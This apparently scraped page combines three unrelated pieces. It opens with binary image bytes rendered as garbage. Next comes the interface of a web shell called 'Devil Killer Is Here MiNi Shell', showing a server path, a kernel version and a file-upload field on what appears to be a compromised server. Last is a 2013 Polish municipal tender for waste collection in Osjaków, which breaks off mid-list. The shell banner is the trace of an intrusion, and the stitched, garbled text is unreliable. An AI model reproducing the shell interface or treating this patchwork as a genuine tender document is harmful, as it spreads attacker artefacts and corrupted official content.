JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130507/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130507/179748-N-2013.html

<p class="kh_header"><b>Osjaków: Odbiór i zagospodarowanie odpadów komunalnych z terenu gminy Osjaków</b><br>
<b>Numer ogłoszenia: 179748 - 2013; data zamieszczenia: 07.05.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Osjaków , ul. Targowa 26, 98-320 Osjaków, woj. łódzkie, tel. (043) 842 33 91, faks (043) 842 33 91 w. 31.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.osjakow.bip.net.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Odbiór i zagospodarowanie odpadów komunalnych z terenu gminy Osjaków.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest Odbiór i zagospodarowanie odpadów komunalnych 
z terenu gminy Osjaków.  Szczegółowy opis przedmiotu zamówienia:
1) Odbiorem i zagospodarowaniem zostaną objęte następujące rodzaje odpadów:
1)	odpady komunalne zmieszane                    - o kodzie 20 03 01,
2)	opakowania ze szkła			          - o kodzie 15 01 07,
3)	zmieszane odpady opakowaniowe             - o kodzie15 01 06 
          (papier, metal, tworzywa sztuczne, 
      opakowania wielomateriałowe),
4)	opakowania z tworzyw sztucznych            - o kodzie 15 01 02,
5)	odpady zielone                                           - o kodzie 20 02 01,
6)	odpady wielkogabarytowe                          - o kodzie  20 03 07,
7)	przeterminowane leki                                  -  o kodzie 20 01 32,
8)	chemikalia                                                  -  o kodzie 20 01 13,    20 01 14,   20 01 15, 
(farby, rozpuszczalniki, oleje odpadowe)                       20 01 19,    20 01 27,   20 01 29,
9)	odpady budowlano - rozbiórkowe              - kody z grupy 17,
10)	opakowania z papieru i tektury       -  o kodzie  15 01 01,
11)	opakowania z metali oraz metale    - o kodzie 15 01 04, 20 01 40. 

2)	Zakres usługi obejmuje odbiór i zagospodarowanie odpadów komunalnych od właścicieli nieruchomości zamieszkałych i niezamieszkałych, na których powstają odpady komunalne, położonych na terenie Gminy Osjaków, wyposażenie w odpowiednie pojemniki i kontenery oraz odbiór i zagospodarowanie odpadów komunalnych z Punktu Selektywnej Zbiórki Odpadów Komunalnych w Osjakowie, zbiórkę odpadów wielkogabarytowych, pochodzących z gospodarstw domowych polegającą na bezpośrednim odbiorze tych odpadów sprzed nieruchomości, zgodnie z Regulaminem utrzymania czystości i porządku w gminie Osjaków, stanowiącym załącznik Nr 11 do SIWZ.
3)	Bezpośrednio z nieruchomości odbierane będą następujące rodzaje odpadów:
a)	odpady komunalne zmieszane (niesegregowane) o kodzie 20 03 01,
b)	odpady komunalne segregowane z podziałem na następujące frakcje:
- odpady opakowaniowe szklane o kodzie 15 01 07,
- zmieszane odpady opakowaniowe o kodzie 15 01 06, tj. papier, metal, tworzywa     sztuczne, opakowania wielomateriałowe (tzw. odpady suche), 
4)	Szacuje się, iż odbiór odpadów komunalnych z nieruchomości będzie się odbywał 
      z następującą częstotliwością:
a)	odpady komunalne zmieszane        -   jeden raz w miesiącu,
b)	odpady opakowaniowe szklane        -  jeden raz  w kwartale,                                                    
c)  odpady suche     			 - jeden raz w miesiącu,    
                                                                 
5)	Odpady będą zbierane i odbierane z pojemników o określonych pojemnościach
i odpowiednich oznaczeniach kolorystycznych, zgodnie z uchwałą Nr XXX/150/2013 Rady Gminy w Osjakowie w sprawie przyjęcia Regulaminu utrzymania czystości
i porządku na terenie Gminy Osjaków, uchwałą Nr XXXI/161/2013 w sprawie przyjęcia Regulaminu utrzymania czystości i porządku na terenie Gminy Osjaków (stanowiącą załącznik Nr 11 do SIWZ), oraz zgodnie z uchwałą Nr XXVIII/136/2013 Rady Gminy 
w Osjakowie z dnia 30 stycznia 2013r. w sprawie sposobu i zakresu świadczenia usług 
w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości 
i zagospodarowania tych odpadów, stanowiącą załącznik Nr 12 do SIWZ.
a)	określa się pojemności poszczególnych pojemników dla nieruchomości   zamieszkałych:
      - odpady komunalne zmieszane - pojemniki 80l, 120l, 240l i 1100l, 
      - odpady opakowaniowe szklane - pojemniki 80l, 120l,
      - odpady suche - pojemniki 80l, 120l, 240l,
b) dla nieruchomości niezamieszkałych:
    - odpady komunalne zmieszane - pojemniki 120l,240l, 1100l lub kontenery KP-5, 
        KP-7, KP-10,
    - odpady zbierane selektywnie - pojemniki 80l, 120l, 240l
c)	wskazuje się ujednolicone oznaczenie kolorystyczne poszczególnych pojemników:
          - odpady komunalne zmieszane - kolor zielony
    - odpady opakowaniowe szklane - kolor pomarańczowy lub w przypadku pojemników  typu IGLOO kolor zielony z przeznaczeniem na szkło kolorowe i kolor biały na szkło bezbarwne,
    - odpady suche - kolor żółty lub w przypadku pojemnika siatkowego na tworzywa 
       sztuczne bez oznaczenia kolorem,
Dopuszcza się możliwość oznakowania pojemników na zmieszane odpady komunalne innym kolorem niż wymienione przy pojemnikach na segregację.
6)	Wykonawca zobowiązany jest:
a)	wyposażyć każdą nieruchomość zamieszkałą i niezamieszkałą, na której powstają odpady komunalne w odpowiednie pojemniki do dnia 21 czerwca 2013 r., 
bez dodatkowych opłat ze strony właściciela nieruchomości, 
b)	przedłożyć Zamawiającemu raport o ilości i rodzaju dostarczonych na wskazane nieruchomości pojemników, w terminie do 25 czerwca 2013r. wraz z informacją, na które nieruchomości nie dostarczono pojemników wraz z uzasadnieniem, 
c)	do comiesięcznego aktualizowania wykazu nieruchomości, z których odebrane zostały odpady komunalne, aktualizacje wykazu powinny zawierać informacje o ilości i rodzaju pojemników znajdujących się na poszczególnych nieruchomościach Gminy Osjaków i składane do 10-go dnia następnego miesiąca,
d)	przedłożyć Zamawiającemu, sporządzony w formie kalendarzyka, harmonogram odbioru odpadów komunalnych,  do akceptacji, w terminie do 21 czerwca 2013r.
e)	dostarczyć mieszkańcom i Zamawiającemu, sporządzonego w formie kalendarzyka,  harmonogram odbioru odpadów komunalnych na okres trwania umowy - do dnia 28 czerwca 2013r.
7)	Dane istotne dla wyposażenia w pojemniki, odbioru i zagospodarowania odpadów komunalnych pochodzących od właścicieli każdej nieruchomości zamieszkałej 
i niezamieszkałej z obszaru Gminy Osjaków.
     Szczegółowy wykaz nieruchomości, z których odbierane będą odpady, wraz z liczbą
i rodzajem pojemników, w które należy je wyposażyć, Zamawiający dostarczy Wykonawcy nie później niż do dnia 07.06.2013 r. Szacunkowe ilości pojemników, które Wykonawca powinien zabezpieczyć i szacowaną ilość odpadów komunalnych do odbioru i zagospodarowania w trakcie realizacji przedmiotu zamówienia określone zostały w rozdziale III pkt 2 ppkt 7 SIWZ (tabele). Dane dotyczące ilości pojemników mają charakter szacunkowy. Podane ilości mogą ulec zmianie stosownie do rzeczywistych potrzeb Zamawiającego. 8) Wyposażenie w odpowiednie pojemniki i kontenery oraz odbiór i zagospodarowanie niżej wymienionych odpadów komunalnych z Punktu Selektywnej Zbiórki Odpadów Komunalnych w Osjakowie,
a)	przeterminowanych leków o kodzie 20 01 32,
b)	chemikaliów (farby, rozpuszczalniki, oleje odpadowe) o kodach 20 01 13*, 20 01 14*, 20 01 15*, 20 01 19*, 20 01 27*, 20 01 29*
c)	odpadów wielkogabarytowych o kodzie 20 03 07,
d)	odpadów budowlano - rozbiórkowych o kodach z grupy 17, 
e)	odpadów zielonych o kodzie 20 02 01,
f)	opakowań ze szkła o kodzie 15 01 07,
g)	opakowań z tworzyw sztucznych o kodzie 15 01 02,
h)	opakowań z papieru i tektury o kodzie 15 01 01.
Odpady wymienione powyżej będą odbierane z częstotliwością wynikającą z potrzeb 
z uwzględnieniem stopnia zapełnienia pojemników na zgłoszenie (realizacja usługi do 3 dni kalendarzowych od dnia zgłoszenia). 
Wykonawca ma obowiązek wyposażyć Punkt Selektywnego Zbierania Odpadów Komunalnych w Osjakowie w odpowiednie pojemniki i kontenery do gromadzenia następujących frakcji odpadów:
a)	przeterminowane leki - pojemnik o pojemności 120 l,
b)	chemikalia (farby, rozpuszczalniki, oleje odpadowe) - wyznaczone miejsce       
do magazynowania odpadów lub kontener o poj.  5,5 m3,
c)	odpady wielkogabarytowe - wyznaczone miejsce do magazynowania odpadów lub  kontener o poj. 5,5 m3,
d)	odpady budowlano - rozbiórkowe - kontener od 5,5 m3, 
e)	odpady zielone - kontener od 5,5 m3,
f)	opakowania ze szkła -dwa pojemniki o pojemności 1,5 m3 (typ IGLOO, szkło białe 
i kolorowe),
g)	opakowania z tworzyw sztucznych - pojemnik o pojemności 2,5 m3 (typ SIATKA),
h)	opakowania z papieru i tektury - pojemnik o pojemności 1,1 m3.
Wielkość i rodzaj pojemników może ulec zmianie w trakcie trwania zamówienia.
Szacowana ilość odpadów do odbioru i zagospodarowania z punktu Selektywnej Zbiórki Odpadów  w Osjakowie szczegółowo określona została w rozdziale III pkt 2 ppkt 8 SIWZ (tabela). 9)Przeprowadzenie zbiórki odpadów wielkogabarytowych, pochodzących z gospodarstw domowych odbywać się będzie poprzez bezpośredni odbiór odpadów sprzed nieruchomości, bez odpadów powstałych w związku z prowadzoną działalnością przez podmioty gospodarcze,  która polegać będzie na:
a)	zebraniu wystawionych następujących rodzajów odpadów:
-	odpady wielkogabarytowe o kodzie 20 03 07 (elementy mebli, meble tapicerowane, dywany, wykładziny, okna),
-	metale (złom metalowy) o kodzie 20 01 40
b)	załadunek odpadów na środek transportu,
c)	zagospodarowanie zebranych odpadów,
d)	uprzątnięcie miejsc, z których odebrane będą odpady.
Zbiórka odpadów wielkogabarytowych będzie odbywała się raz w roku w okresie wiosenno- letnim bądź jesiennym. Termin zbiórki zostanie uzgodniony pomiędzy Zamawiającym, a Wykonawcą z 3-miesięcznym wyprzedzeniem. Wykonawca będzie zobowiązany przedłożyć Zamawiającemu harmonogram zbiórki w terminie 30 dni przed jej przeprowadzeniem. Szacowana ilość odpadów do odbioru i zagospodarowania w trakcie realizacji zamówienia z objazdowej zbiórki odpadów wielkogabarytowych z terenu Gminy Osjaków wynosi 10 Mg
10) Informacje dodatkowe istotne z punktu widzenia przedmiotu zamówienia:
a)    charakterystyka gminy Osjaków
  Gmina Osjaków to gmina wiejska, obejmująca swym zasięgiem 20 sołectw: Borki Walkowskie, Chorzyna, Czernice, Dębina, Dolina Czernicka, Drobnice, Felinów, Gabrielów, Jasień, Józefina, Kolonia Radecka, Krzętle, Kuźnica Ługowska, Kuźnica Strobińska, Nowa Wieś, Osjaków, Raducki Folwark, Raduczyce, Walków, Zofia. Powierzchnia gminy wynosi - 10 074ha. Liczba mieszkańców zameldowanych na pobyt stały i pobyt czasowy wg stanu na dzień 31.12.2012r. - wynosiła 4 832 osób.

b)  drogi - szacunkowy wykaz w kilometrach dróg przebiegających przez Gminę Osjaków:     
                 - drogi dojazdowe gminne:  127 km,
- drogi powiatowe:                 30 km,
- drogi krajowe                    14 km

c) nieruchomości zamieszkałe
Do nieruchomości zamieszkałych zalicza się wszystkie nieruchomości, na których zamieszkują mieszkańcy, tj. gospodarstwa domowe.
       Szacunkowa liczba zamieszkujących mieszkańców gminy Osjaków wynosi  - 4 183 osób.Szacunkowa liczba gospodarstw domowych wynosi - 1 216.
Wykaz sołectw wraz z szacunkową liczbą mieszkańców i gospodarstw domowych stanowi załącznik Nr 9 do SIWZ.

d) nieruchomości niezamieszkałe
Do nieruchomości niezamieszkałych zalicza się zabudowane działki rekreacyjne 
i letniskowe, obiekty użyteczności publicznej, przedsiębiorstwa, cmentarze.
   Wykaz sołectw wraz z szacunkową liczbą nieruchomości niezamieszkałych objętych  
  obowiązkiem wywozu odpadów, za wyjątkiem firm, stanowi załącznik Nr 10  do SIWZ.
W przypadku działek rekreacyjnych szacuje się, że faktyczne użytkowanie nieruchomości i konieczność wywozu odpadów, będzie głównie w miesiącach letnich, 
tj. od czerwca do września; szacuje się, że powstawanie odpadów komunalnych zadeklaruje około 30% właścicieli tych nieruchomości. 
Szacowana liczba firm, które faktycznie wytwarzają odpady komunalne na terenie gminy i zostaną objęte obowiązkiem wywozu odpadów wynosi - 90.
e) ilości odpadów komunalnych zebranych z terenu Gminy Osjaków w roku 2012, 
 z uwzględnieniem podziału na poszczególne określone zostały w rozdziale III pkt 2 ppkt 10 SIWZ (tabela).
11)	Obowiązki Wykonawcy:
a)	Wykonawca ma obowiązek prawidłowo gospodarować odebranymi odpadami zgodnie z przepisami obowiązującymi w tym zakresie. 
b)	Wykonawca jest zobowiązany do przekazywania odebranych zmieszanych odpadów komunalnych, odpadów zielonych oraz pozostałości z sortowania zmieszanych odpadów komunalnych przeznaczonych do składowania do Regionalnej Instalacji do Przetwarzania Odpadów Komunalnych właściwej dla regionu II lub, w szczególnych przypadkach, do instalacji przewidzianej do zastępczej obsługi regionu zgodnie z uchwałą nr XXVI/482/12 Sejmiku Województwa Łódzkiego z dnia 21 czerwca 2012r. w sprawie uchwalenia Planu Gospodarki Odpadami dla województwa łódzkiego 2012r.c)	Wykonawca jest zobowiązany do przekazywania selektywnie zebranych odpadów komunalnych do instalacji odzysku i unieszkodliwiania zgodnie z hierarchią postępowania z odpadami, o której mowa w art. 17 ustawy z dnia 14 grudnia 2012 r. o odpadach (Dz. U. z 2013 r. poz. 21).
d)	Wykonawca jest zobowiązany uzyskać:
- poziom ograniczenia masy odpadów komunalnych ulegających biodegradacji przekazywanych do składowania w poszczególnych latach zgodnie z rozporządzeniem Ministra Środowiska  z dnia 25 maja 2012r. w sprawie poziomów ograniczenia masy odpadów komunalnych ulegających biodegradacji przekazywanych do składowania oraz sposobu obliczania poziomu ograniczania masy tych odpadów  (Dz. U. z 2012, poz. 676),
-poziom recyklingu i przygotowania do ponownego użycia następujących frakcji odpadów komunalnych: papieru, metali, tworzyw sztucznych i szkła,
- poziom recyklingu, przygotowania do ponownego użycia i odzysku innymi metodami innych niż niebezpieczne odpadów budowlanych i rozbiórkowych w poszczególnych latach zgodnie z Rozporządzeniem Ministra Środowiska z dnia 29 maja 2012 r. w sprawie poziomów recyklingu, przygotowania do ponownego użycia i odzysku innymi metodami niektórych frakcji odpadów komunalnych (Dz. U. z 2012, poz. 645).
e)	Wykonawca będzie monitorował selektywny sposób zbierania odpadów komunalnych oraz niezwłoczne informował Zamawiającego o nieprawidłowej segregacji odpadów wraz z wykonaniem dokumentacji fotograficznej i protokołem opisującym zaistniałą sytuację.
f)	Wykonawca zobowiązany jest do odbierania każdej ilości odpadów znajdujących się w pojemniku, bez względu na stopień jego zapełnienia, a także bez względu na sposób segregacji odpadów przez właściciela nieruchomości. 
g) 	W sytuacjach nadzwyczajnych (jak np. nieprzejezdność lub zamknięcie drogi),  gdy nie jest możliwa realizacja usługi zgodnie z umową, sposób i termin odbioru odpadów będzie każdorazowo uzgadniany pomiędzy Zamawiającym, a Wykonawcą i może polegać  w szczególności na wyznaczeniu zastępczych miejsc gromadzenia odpadów przez właścicieli nieruchomości oraz innych terminów ich odbioru.
h) Wykonawca jest zobowiązany do zdobycia wszelkich informacji niezbędnych do prawidłowego przygotowania oferty oraz sprawdzenia i zweryfikowania materiałów przetargowych oraz do niezwłocznego poinformowania Zamawiającego 
o ewentualnych błędach i przeoczeniach. 
i)    Wykonawca jest zobowiązany do:
- comiesięcznego aktualizowania (uzupełniania) wykazu nieruchomości, z których odebrane zostały odpady, aktualizacja powinna zwierać informację o ilości i rodzaju pojemników znajdujących się na poszczególnych zamieszkałych nieruchomościach Gminy Osjaków,
- comiesięcznego potwierdzania ilości i rodzaju odebranych i zagospodarowanych odpadów z terenu Gminy Osjaków.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających, na podstawie art. 67 ust. 1 pkt 6 ustawy Prawo zamówień publicznych, o wielkości do 20% zamówienia podstawowego</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.53.30.00-2, 90.51.31.00-7, 90.50.00.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający żąda wniesienia wadium w wysokości 8 000,00 zł (słownie: osiem  tysięcy zł 00/100). Wadium może być wniesione w następujących formach:
a)	pieniądzu, 
b)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym,
c)	gwarancjach bankowych,
d)	gwarancjach ubezpieczeniowych,
e)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju przedsiębiorczości (Dz. U. z 2001r. Nr 42, poz. 275).
Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy Zamawiającego: NBS Działoszyn O/Osjaków Nr 12 9251 1019 0011 1285 2000 0080
z dopiskiem wadium - odbiór i zagospodarowanie odpadów komunalnych z terenu gminy Osjaków.	W przypadku składania przez wykonawcę wadium w formie gwarancji lub poręczeń, gwarancja lub poręczenie musi być sporządzone zgodnie z obowiązującym prawem i zawierać następujące elementy:
1)	nazwę i adres wykonawcy (dającego zlecenie), zamawiającego (beneficjenta gwarancji), gwaranta (banku lub instytucji ubezpieczeniowej, które udzielają gwarancji) ,
2)	określenie wierzytelności, która ma być zabezpieczona gwarancją,
3)	kwotę gwarancji,
4)	termin ważności gwarancji,
5)	zobowiązanie gwaranta do zapłacenia kwoty gwarancji na każde pisemne żądanie Zamawiającego złożone w terminie związania ofertą pełnej kwoty wadium w przypadku okoliczności, o których mowa w art. 46 ust. 4a i art. 46 ust. 5 ustawy, tj:  gdy wykonawca:
a)	odmówił podpisania umowy w sprawie zamówienia publicznego na  warunkach 
     określonych w ofercie, lub
b)	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy, lub
c)	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe 
     z przyczyn leżących po stronie wykonawcy, lub
d)	wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust.3, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 lub pełnomocnictw,  chyba że udowodni, , że wynika to z przyczyn nieleżących po jego stronie.
5)     W przypadku składania przez wykonawcę wadium w formie gwarancji lub poręczeń,  gwarancja lub poręczenie (oryginał) musi być dołączone do oferty w oddzielnej kopercie opisanej wadium - odbiór i zagospodarowanie odpadów komunalnych z terenu gminy Osjaków, a kserokopia dołączona do treści oferty.
Wadium należy wnieść przed upływem terminu składania ofert, przy czym wniesienie wadium w pieniądzu za pomocą przelewu bankowego Zamawiający uzna za skuteczne wówczas, gdy bank prowadzący rachunek bankowy Zamawiającego potwierdzi, że otrzymał taki przelew przed upływem terminu składania ofert. W przypadku wniesienia wadium w pieniądzu do oferty należy dołączyć kopię polecenia przelewu. Ponadto warunkiem koniecznym do uznania przez Zamawiającego terminowego wniesienia wadium jest potwierdzenie banku, o którym mowa w pkt 6. Zwrot wadium odbywać się będzie zgodnie z zasadami określonymi w art. 46 ustawy. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została wybrana:
a)	odmówił odpisania umowy w sprawie zamówienia publicznego na  warunkach 
        określonych w ofercie, lub
b)	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy, lub
c)	zawarcie  umowy w sprawie zamówienia publicznego stało się niemożliwe 
        z przyczyn leżących po stronie wykonawcy, lub
d)	wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3, nie złożył  dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1, lub pełnomocnictw,  chyba, że udowodni, że wynika to z przyczyn nieleżących po jego stronie.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca udokumentuje posiadanie uprawnień do wykonywania określonej działalności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesji, zezwolenia lub licencji, poprzez złożenie dokumentu potwierdzającego wpis do rejestru działalności regulowanej 
w zakresie odbierania odpadów komunalnych od właścicieli nieruchomości zgodnie 
z wymogami ustawy z dnia 13 września 1996r. o utrzymaniu czystości i porządku 
w gminie (Dz. U. z 2012r., poz. 391) i  złożenie aktualnego zezwolenia na transport, zbieranie i przetwarzanie odpadów komunalnych zgodnie z wymogami ustawy z dnia 27 kwietnia 2001r. o odpadach (Dz. U. z 2013r., poz. 21). Ocena spełniania ww warunków dokonana zostanie zgodnie z formułą spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach lub oświadczeniach wyszczególnionych w rozdziale VI niniejszej SIWZ. Z treści załączonych oświadczeń lub dokumentów musi wynikać jednoznacznie, iż ww warunki Wykonawca spełnił</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna ten warunek za spełniony jeżeli Wykonawca wykaże się doświadczeniem w zakresie realizacji co najmniej 1 usługi polegającej na odbieraniu i zagospodarowaniu odpadów komunalnych o wartości nie mniejszej niż 300 000,00 zł brutto wykonanej w okresie ostatnich trzech lat, przed upływem terminu składania ofert (2012r., 2011r., 2010r.), a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, daty wykonania i podmiotu, na rzecz którego usługa  została wykonana oraz załączeniem dowodów, czy usługa została wykonana lub jest wykonywana należycie. 
Ocena spełniania ww warunków dokonana zostanie zgodnie z formułą spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach lub oświadczeniach wyszczególnionych w rozdziale VI niniejszej SIWZ. Z treści załączonych oświadczeń lub dokumentów musi wynikać jednoznacznie, iż ww warunki Wykonawca spełnił.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli 
a) Wykonawca na czas realizacji będzie dysponował:
- co najmniej 2 pojazdami przystosowanymi do odbierania zmieszanych odpadów komunalnych,
- co najmniej 2 pojazdami przystosowanymi do odbierania selektywnie zebranych odpadów komunalnych,
- co najmniej 1 pojazdem do odbierania odpadów bez funkcji kompaktującej.
